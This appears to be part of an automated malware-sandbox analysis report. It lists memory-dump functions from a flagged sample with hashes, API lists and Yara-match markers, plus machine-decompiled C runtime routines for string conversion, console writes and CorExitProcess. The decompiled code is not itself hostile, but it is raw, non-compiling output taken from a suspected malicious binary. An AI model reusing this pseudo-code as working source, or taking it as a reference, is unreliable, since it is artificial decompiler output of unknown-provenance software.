            Function 05260440, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000000A.00000002.687458863.0000000005260000.00000040.00000001.sdmp, Offset: 05260000, based on PE: false
            Similarity
            • API ID: DispatchMessage
            • String ID:
            • API String ID: 2061451462-0
            • Opcode ID: 0fc6977898b4c294cf99ae65b92caaf81164343626425bac321346350e98af5e
            • Instruction ID: 4621c3e049bd05000faa3377186b0e79b88b646048a4299b7cf2be8be230dea7
            • Opcode Fuzzy Hash: 0fc6977898b4c294cf99ae65b92caaf81164343626425bac321346350e98af5e
            • Instruction Fuzzy Hash: 2B11D0B5D046498FDB20CF9AD848BDEFBF4FB48314F10852AE819A7600D378A545CFA5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 050DBC59, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000), ref: 050DBCBD
            Memory Dump Source
            • Source File: 0000000A.00000002.686523167.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: e3f8550c2a0bb4488e444a6754f9b8307715f33fde19029dda40ae53d325f511
            • Instruction ID: 2734ddc56de03a1eaacd9877e704420e8653ea49cafa6fc0e3786c2e7a477b45
            • Opcode Fuzzy Hash: e3f8550c2a0bb4488e444a6754f9b8307715f33fde19029dda40ae53d325f511
            • Instruction Fuzzy Hash: 061100B98003498FDB10CF99D885BDEFBF8FB48320F10882AE818A7600C374A544CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A4D4C4, Relevance: .1, Instructions: 75COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000A.00000002.683919210.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4cd168af5382a5f3b79a4005a7cb978bb665a625fff909facd1de11e375a819a
            • Instruction ID: 4e6cd1db5c62a66db082174dd0bd63ccd1666705beebe1e414c5fb5947d5310b
            • Opcode Fuzzy Hash: 4cd168af5382a5f3b79a4005a7cb978bb665a625fff909facd1de11e375a819a
            • Instruction Fuzzy Hash: A02103B5604240DFDB01DF10D8C0F26BF65FBC8328F24C569E9054B206C736D816CBA2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A4D5B0, Relevance: .1, Instructions: 75COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000A.00000002.683919210.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 09e181571646fab02b154b36c8d3c70b51798e13813ff58a2571621cc130eae6
            • Instruction ID: d2ca6ed1b6440d7f5080a4583c1daaff20e65f8a9fd8ee4dd77e8c4d959c8f29
            • Opcode Fuzzy Hash: 09e181571646fab02b154b36c8d3c70b51798e13813ff58a2571621cc130eae6
            • Instruction Fuzzy Hash: 3B21FFB9608240DFDB01CF10D8C0F26BFA5FBD8324F258569E9094B20AC336D856CAA2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A5D1D4, Relevance: .1, Instructions: 72COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000A.00000002.683939568.0000000000A5D000.00000040.00000001.sdmp, Offset: 00A5D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 381067b71ab18ab4fcfede9e131d770658490e5e24dd37ee4f5f86089a5567f2
            • Instruction ID: 04576ac74910b4bc42bee346c726ae7574bc732105acf5ab3e2bb11b82580b23
            • Opcode Fuzzy Hash: 381067b71ab18ab4fcfede9e131d770658490e5e24dd37ee4f5f86089a5567f2
            • Instruction Fuzzy Hash: D021F2B0604240EFDB21CF50D9C0B6ABBA5FB84315F24CA6DED094B246C376D84ACA61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A5D01C, Relevance: .1, Instructions: 72COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000A.00000002.683939568.0000000000A5D000.00000040.00000001.sdmp, Offset: 00A5D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d01c81b841efe660029345fff8d8486fee43bc18630c8cd5ef261f9cf3574fbe
            • Instruction ID: 812714ad889eaf552500a354d2ec0f64425522f36ade3a39716da490b8c8e97a
            • Opcode Fuzzy Hash: d01c81b841efe660029345fff8d8486fee43bc18630c8cd5ef261f9cf3574fbe
            • Instruction Fuzzy Hash: F921D775604244DFDB24DF14D4C4B16BB65FB84315F34C569DD4A4B286C33AD84BCB61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A5D005, Relevance: .1, Instructions: 60COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000A.00000002.683939568.0000000000A5D000.00000040.00000001.sdmp, Offset: 00A5D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b7b08944f4130ee9e850c3dbd9a7e49a038f714d4d17a9321dd3843d68d52ee7
            • Instruction ID: 13d16721fd3f24b418c7888ccfacf4f21d0b359d47de42b1cba6986dad3f267a
            • Opcode Fuzzy Hash: b7b08944f4130ee9e850c3dbd9a7e49a038f714d4d17a9321dd3843d68d52ee7
            • Instruction Fuzzy Hash: F4215E755093C08FDB12CF20D994B15BF71FB46314F28C6EAD8498B697C33A980ACB62
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A4D5AB, Relevance: .1, Instructions: 56COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000A.00000002.683919210.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2d1ced6dc2e75453a2601a127eb843bfa51fca63bdaac9e78988749db0cf302c
            • Instruction ID: 00445a8c0758d4e0d59564b2606d71bbe85c0c041a61742c8880607e0fa90ca6
            • Opcode Fuzzy Hash: 2d1ced6dc2e75453a2601a127eb843bfa51fca63bdaac9e78988749db0cf302c
            • Instruction Fuzzy Hash: 63117C76504280DFCF16CF14D9C4B16FF62FB98324F25C6A9D8094B656C33AD85ACBA2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A4D4BF, Relevance: .1, Instructions: 56COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000A.00000002.683919210.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2d1ced6dc2e75453a2601a127eb843bfa51fca63bdaac9e78988749db0cf302c
            • Instruction ID: 7a2edfa98ed5f9484cf9d60ca4dce4610025f8788a1c1028a681dd39cb703040
            • Opcode Fuzzy Hash: 2d1ced6dc2e75453a2601a127eb843bfa51fca63bdaac9e78988749db0cf302c
            • Instruction Fuzzy Hash: 24119376504280DFCF15CF14D5C4B16BF71FB94324F24C6A9D8494B656C336D856CBA2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A5D1CF, Relevance: .1, Instructions: 53COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000A.00000002.683939568.0000000000A5D000.00000040.00000001.sdmp, Offset: 00A5D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 47f075cdb6666318d721bc5846118bef7950f0453c65f354d1bc6af126a2814c
            • Instruction ID: 8bc4d8239bceacb3a0b6b40637ebe4939650f36a80dbb211a4880d0d9c2648d1
            • Opcode Fuzzy Hash: 47f075cdb6666318d721bc5846118bef7950f0453c65f354d1bc6af126a2814c
            • Instruction Fuzzy Hash: 01118B75904280DFCB21CF10D5C4B59FBA1FB84324F24C6AEDC494B656C33AD85ACB62
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A4D01D, Relevance: .0, Instructions: 45COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000A.00000002.683919210.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b1eb4b6773046cbdb90af58d419403b052d887efd6cdbe5caf7902a638d1041f
            • Instruction ID: 3bc4996b15d2e8d47aa2f944ab3e9b5c37304d43a81286c8943be185d5bf3cfc
            • Opcode Fuzzy Hash: b1eb4b6773046cbdb90af58d419403b052d887efd6cdbe5caf7902a638d1041f
            • Instruction Fuzzy Hash: 0501DBB550C3809AE7104F25CCC4BA7FBD8EFD1364F18C55AED465B246C3799846C6B1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A4D01C, Relevance: .0, Instructions: 36COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000A.00000002.683919210.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1de67c919d6b917e184169b105a5f0ec42fee8d9d650ea248e0ae877f3ec3800
            • Instruction ID: acdd4434ae6390c87418bf3b9cec151caf90f99287c0f3bf028205bc4915308e
            • Opcode Fuzzy Hash: 1de67c919d6b917e184169b105a5f0ec42fee8d9d650ea248e0ae877f3ec3800
            • Instruction Fuzzy Hash: 20F062B1408384AEE7108F15CCC4B62FB98EB91724F18C55AED495B686C3799845CAB1
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
            Download Yara Rule
            C-Code - Quality: 70%
            			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x64572fa4
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























            0x004078d4
            0x004078d5
            0x004078d6
            0x004078dd
            0x004078e2
            0x004078e8
            0x004078ee
            0x004078f4
            0x004078f7
            0x004078f7
            0x004078fa
            0x004078fc
            0x004078fc
            0x004078fa
            0x004078fe
            0x00407903
            0x0040790a
            0x0040790d
            0x0040790d
            0x00407929
            0x0040792f
            0x00407934
            0x00407ac7
            0x00407ad2
            0x00407ada
            0x0040793a
            0x0040793a
            0x0040793d
            0x00407942
            0x00407946
            0x0040799a
            0x0040799a
            0x0040799c
            0x0040799e
            0x00407abc
            0x00407abc
            0x00407abe
            0x00407abf
            0x00407ac5
            0x00000000
            0x00407ac5
            0x004079af
            0x004079b5
            0x004079b7
            0x00000000
            0x00000000
            0x004079bd
            0x004079cf
            0x004079d4
            0x004079d8
            0x00000000
            0x00000000
            0x004079e5
            0x00407a1f
            0x00407a22
            0x00407a25
            0x00407a27
            0x00407a29
            0x00407a2b
            0x00407a77
            0x00407a77
            0x00407a79
            0x00407a79
            0x00407a7b
            0x00407ab5
            0x00407ab6
            0x00000000
            0x00407abb
            0x00407a8f
            0x00407a94
            0x00407a96
            0x00000000
            0x00000000
            0x00407a9a
            0x00407a9b
            0x00407a9c
            0x00407a9f
            0x00407adb
            0x00407ade
            0x00407aa1
            0x00407aa1
            0x00407aa2
            0x00407aa2
            0x00407aaf
            0x00407ab1
            0x00407ab3
            0x00407ae4
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00407ab3
            0x00407a2d
            0x00407a30
            0x00407a32
            0x00407a34
            0x00407a36
            0x00407a39
            0x00407a3e
            0x00407a59
            0x00407a5b
            0x00407a65
            0x00407a67
            0x00407a68
            0x00407a6a
            0x00000000
            0x00000000
            0x00407a6c
            0x00407a72
            0x00407a72
            0x00000000
            0x00407a72
            0x00407a40
            0x00407a42
            0x00407a46
            0x00407a4b
            0x00407a4d
            0x00407a4f
            0x00000000
            0x00000000
            0x00407a51
            0x00000000
            0x00407a51
            0x004079e7
            0x004079ec
            0x00000000
            0x00000000
            0x004079f2
            0x004079f4
            0x00000000
            0x00000000
            0x00407a10
            0x00407a14
            0x00000000
            0x00000000
            0x00000000
            0x00407a1a
            0x0040794d
            0x0040794f
            0x00407951
            0x00407959
            0x00407978
            0x0040797a
            0x00407984
            0x00407986
            0x00407987
            0x00407989
            0x00000000
            0x00000000
            0x0040798f
            0x00407995
            0x00407995
            0x00000000
            0x00407995
            0x0040795d
            0x00407961
            0x00407966
            0x0040796a
            0x00000000
            0x00000000
            0x00407970
            0x00000000
            0x00407970

            APIs
            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
            • __alloca_probe_16.LIBCMT ref: 00407961
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
            • __alloca_probe_16.LIBCMT ref: 00407A46
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
            • __freea.LIBCMT ref: 00407AB6
              • Part of subcall function 00403E3D: HeapAlloc.KERNEL32(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            • __freea.LIBCMT ref: 00407ABF
            • __freea.LIBCMT ref: 00407AE4
            Memory Dump Source
            • Source File: 0000000A.00000001.662833813.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
            • String ID:
            • API String ID: 2597970681-0
            • Opcode ID: 6323cb0b7d2df73dac5208e1b50e0fd54892c29b0e50e7b46a165c1f56bcb0f0
            • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
            • Opcode Fuzzy Hash: 6323cb0b7d2df73dac5208e1b50e0fd54892c29b0e50e7b46a165c1f56bcb0f0
            • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
            Download Yara Rule
            C-Code - Quality: 72%
            			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x64572fa4
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}



































            0x0040822b
            0x00408232
            0x00408235
            0x0040823d
            0x00408241
            0x0040824d
            0x00408250
            0x00408253
            0x0040825a
            0x00408262
            0x00408265
            0x0040826b
            0x00408271
            0x00408276
            0x00408278
            0x0040827b
            0x00408280
            0x0040828a
            0x00408291
            0x00408294
            0x0040829b
            0x004082a2
            0x004082ce
            0x004082f4
            0x004082f6
            0x00000000
            0x004082d0
            0x004082d3
            0x0040839a
            0x004083a6
            0x004083b1
            0x004083b6
            0x004082d9
            0x004082e0
            0x004082e5
            0x004082eb
            0x004082f1
            0x00000000
            0x004082f1
            0x004082eb
            0x004082d3
            0x004082a4
            0x004082a8
            0x004082ab
            0x004082b1
            0x004082b3
            0x004082b6
            0x004082ba
            0x004082f7
            0x004082fa
            0x004082fb
            0x00408300
            0x00408306
            0x0040830c
            0x0040831b
            0x00408321
            0x00408327
            0x0040832c
            0x00408348
            0x004083bb
            0x004083c1
            0x0040834a
            0x00408352
            0x0040835b
            0x00408361
            0x00000000
            0x00408363
            0x00408365
            0x00408368
            0x00408381
            0x00000000
            0x00408383
            0x00408387
            0x00408389
            0x0040838c
            0x00000000
            0x0040838c
            0x00408387
            0x00408381
            0x00408361
            0x0040835b
            0x00408348
            0x0040832c
            0x00408306
            0x00000000
            0x0040838f
            0x0040838f
            0x004083c3
            0x004083cd
            0x004083d5

            APIs
            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
            • __fassign.LIBCMT ref: 004082E0
            • __fassign.LIBCMT ref: 004082FB
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
            • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
            • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
            Memory Dump Source
            • Source File: 0000000A.00000001.662833813.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
            • String ID:
            • API String ID: 1324828854-0
            • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
            • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
            • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
            • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 27%
            			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x64572fa4
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}









            0x00403639
            0x00403640
            0x00403643
            0x00403647
            0x00403652
            0x0040365a
            0x00403665
            0x0040366b
            0x0040366f
            0x00403676
            0x0040367c
            0x0040367c
            0x0040367e
            0x00403683
            0x00403688
            0x00403688
            0x00403693
            0x0040369b

            APIs
            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
            • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
            Strings
            Memory Dump Source
            • Source File: 0000000A.00000001.662833813.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: AddressFreeHandleLibraryModuleProc
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 4061214504-1276376045
            • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
            • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
            • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
            • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
            Download Yara Rule
            C-Code - Quality: 79%
            			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x64572fa4
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























            0x004062c0
            0x004062c7
            0x004062ca
            0x004062d3
